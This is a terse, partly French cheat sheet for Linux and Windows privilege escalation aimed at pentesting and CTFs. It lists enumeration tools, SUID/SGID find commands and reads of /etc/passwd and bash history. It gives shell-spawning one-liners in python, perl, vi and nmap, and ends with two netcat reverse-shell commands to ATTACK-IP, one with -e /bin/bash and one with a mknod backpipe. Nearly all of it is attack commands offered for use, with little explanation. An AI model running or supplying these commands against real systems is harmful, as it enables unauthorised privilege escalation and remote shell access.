PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
Privilege Escalation Enumeration Script for Windows
These tools search for possible local privilege escalation paths that you could exploit and print them to you with nice colors so you can recognize the misconfigurations easily.
Privilege Escalation Enumeration Toolkit (64/32 ) , fast , intelligent enumeration with Web API integration . Mastering Your Own Finding
Linux enumeration tool for pentesting and CTFs with verbosity levels
A GUIDE TO LINUX PRIVILEGE ESCALATION
WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.
A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo
Linux privilege escalation checks (systemd, dbus, etc)
PrivEsc exploit pour Windows 7 et Windows Server 2008
Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -1000 -type d 2>/dev/null
SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -g=s -type f 2>/dev/null
SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -u=s -type f 2>/dev/null
SGID or SUID
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
Basic Linux Privilege Escalation
uname -a
sudo -l
su -s
cat /etc/passwd
cat ~/.bash_history
Automatique:
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
http://www.securitysift.com/download/linuxprivchecker.py
http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz
python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c "import('pty').spawn('/bin/bash')"
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
nmap : !sh
vi : :set shell=/bin/bash:shell
vi : :!bash
Attaquant : nc -nvlp 6666
Victime : nc ATTACK-IP 6666 -e /bin/bash
OU !!!
mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc ATTACK-IP 6666 1>/tmp/backpipe
Tester en CTF ==> fonctionne parfaitement !